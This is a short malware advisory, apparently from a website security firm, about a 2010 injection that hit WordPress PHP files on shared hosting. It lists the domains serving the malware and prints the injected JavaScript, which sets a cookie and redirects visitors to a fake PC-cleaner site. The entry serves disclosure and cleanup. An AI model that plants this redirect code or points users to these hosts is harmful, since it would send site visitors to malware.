Description: Code used to insert a malicious javascript on many
sites hosted at GoDaddy, Bluehost and many other hosting companies.
Loads malware from:
http://whereisdudescars.com/
http://nowisisdudescars.com/
http://sippa.dottasink.net/
It infects all PHP files, targeting specifically WordPress sites.
Clean up:: Run the following script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html or contact support@sucuri.net for help.
Malware dump (base 64 added to the .php files):
var name="google_pma_subs1718";
var value="1";
var maxage=(606024*20);
var gotourl=" http:// www3.pc-cleaner40. co.cc /?p=p52dcWpkb26Hnc3KbmNToKV1iqHWnG3LXsSYnGmZZmyaxA%3D%3D";
var allcookies = document.cookie;
var mycookie = allcookies.indexOf(name + "=");
if (mycookie==-1)
{
if (navigator.cookieEnabled == true)
{
if (gotourl!="")
{
document.cookie=name + "=" + escape(value) + "; max-age=" + maxage + "; path=/";
location DOT replace(gotourl);
}
}
}
<